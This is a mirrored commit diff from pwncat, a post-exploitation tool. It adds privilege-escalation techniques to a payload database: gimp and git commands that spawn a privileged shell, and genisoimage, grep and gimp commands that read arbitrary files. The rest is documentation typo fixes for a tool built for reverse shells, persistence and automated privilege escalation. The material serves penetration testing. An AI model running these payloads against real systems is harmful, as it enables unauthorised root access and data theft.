mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-12-11 17:34:19 +01:00
Merge branch 'master' of github.com:calebstewart/pwncat
This commit is contained in:
commit
94ea7ea969
@ -800,6 +800,64 @@
|
||||
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
|
||||
}
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
"genisoimage": [
|
||||
{
|
||||
"type": "read",
|
||||
"stream" : "print",
|
||||
"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
|
||||
"args": []
|
||||
}
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
"gimp": [
|
||||
{
|
||||
"type": "shell",
|
||||
"payload": "{command}",
|
||||
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
|
||||
"exit": "exit"
|
||||
},
|
||||
{
|
||||
"type": "read",
|
||||
"stream": "raw",
|
||||
"payload": "{command} 2>/dev/null",
|
||||
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
|
||||
}
|
||||
|
||||
// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
|
||||
// Since it can get a shell, this is not really an issue.
|
||||
// {
|
||||
// "type": "write",
|
||||
// "stream":"raw",
|
||||
// "payload": "{command} 2>/dev/null",
|
||||
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
|
||||
// },
|
||||
// {
|
||||
// "type": "write",
|
||||
// "stream":"base64",
|
||||
// "payload": "{command} 2>/dev/null",
|
||||
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
|
||||
// }
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
"git": [
|
||||
{
|
||||
"type": "shell",
|
||||
"payload": "{command}",
|
||||
"args": ["help", "config"],
|
||||
"input": "!{shell}\n",
|
||||
"exit": "exit\nq\n"
|
||||
}
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
"grep": [
|
||||
{
|
||||
"type": "read",
|
||||
"stream":"print",
|
||||
"payload": "{command}",
|
||||
"args": ["''", "{lfile}"]
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
|
||||
|
@ -3,7 +3,7 @@ API Documentation
|
||||
|
||||
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
|
||||
with the remote host. A large variety of interaction with the remote host has been abstracted to
|
||||
make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
|
||||
make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
|
||||
prompt commands or more complicated privilege escalation or persistence methods.
|
||||
|
||||
.. toctree::
|
||||
|
@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
|
||||
Methods vs Techniques
|
||||
---------------------
|
||||
|
||||
Privelege escalation methods may implement multiple techniques. Techniques represent a single action
|
||||
Privilege escalation methods may implement multiple techniques. Techniques represent a single action
|
||||
which a specific privilege escalation method can perform. Each technique is identified by it's method,
|
||||
the user which the action can be performed as, a Capability and some method specific data.
|
||||
|
||||
|
@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
|
||||
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
|
||||
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
|
||||
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
|
||||
on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
|
||||
on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
|
||||
up until the end delimeter.
|
||||
|
||||
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
|
||||
@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
|
||||
import os
|
||||
import shutil
|
||||
|
||||
with open("loca-file", "rb") as src:
|
||||
with open("local-file", "rb") as src:
|
||||
with pwncat.victim.open("/tmp/remote-file", "wb",
|
||||
length=os.path.getsize("local-file")) as dst:
|
||||
shutil.copyfileobj(src, dst)
|
||||
@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
|
||||
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
|
||||
yielding each abstracted service object. Each object contains a name, description, and state as well as
|
||||
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
|
||||
on you having the correct permission to manage the services, however retrieve the state and list of
|
||||
on you having the correct permission to manage the services, however retrieving the state and list of
|
||||
services should work regardless of your permission level.
|
||||
|
||||
.. code-block:: python
|
||||
@ -122,7 +122,7 @@ services should work regardless of your permission level.
|
||||
print(f"{service.name} is {'running' if service.running else 'stopped'}")
|
||||
|
||||
To find a specific service by name, there is a ``find_service`` method which returns an individual
|
||||
remote service object. If the service is not found, a ValueError is raised.
|
||||
remote service object. If the service is not found, a ``ValueError`` is raised.
|
||||
|
||||
.. code-block:: python
|
||||
|
||||
|
@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:
|
||||
|
||||
.. code-block:: bash
|
||||
|
||||
set -p bob "b0b5_P@ss0rd"
|
||||
set -p bob "b0b5_P@ssw0rd"
|
||||
|
||||
Key Bindings
|
||||
------------
|
||||
|
@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
|
||||
on the remote host and provide you with raw terminal access.
|
||||
|
||||
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
|
||||
programatically interact with the remote host alongside your terminal access.
|
||||
programmatically interact with the remote host alongside your terminal access.
|
||||
pwncat provides you with a local shell interface which can utilize your
|
||||
connection for enumeration, file upload/download, automatic persistence
|
||||
installation and even automated privilege escalation.
|
||||
@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
|
||||
# You now have a full terminal that doesn't exit on C-c
|
||||
remote$
|
||||
|
||||
This works well. However, the added steps to get a reverse shell are laberous
|
||||
This works well. However, the added steps to get a reverse shell are laborious
|
||||
after a while. Also, the danger of losing your remote shell by accidentally
|
||||
pressing "C-c" prior to gaining raw access is high. This was the original
|
||||
inspiration of this project.
|
||||
|
@ -5,7 +5,7 @@ Installation
|
||||
:maxdepth: -1
|
||||
|
||||
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
|
||||
you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
|
||||
you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
|
||||
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
|
||||
|
||||
.. code-block:: bash
|
||||
|
@ -502,7 +502,7 @@ class Victim:
|
||||
:return: The full path to the requested binary or None if it was not found.
|
||||
"""
|
||||
|
||||
if self.has_busybox:
|
||||
if self.host.busybox is not None:
|
||||
if name in self.busybox_provides:
|
||||
if quote:
|
||||
return f"{shlex.quote(str(self.busybox_path))} {name}"
|
||||
|
Loading…
Reference in New Issue
Block a user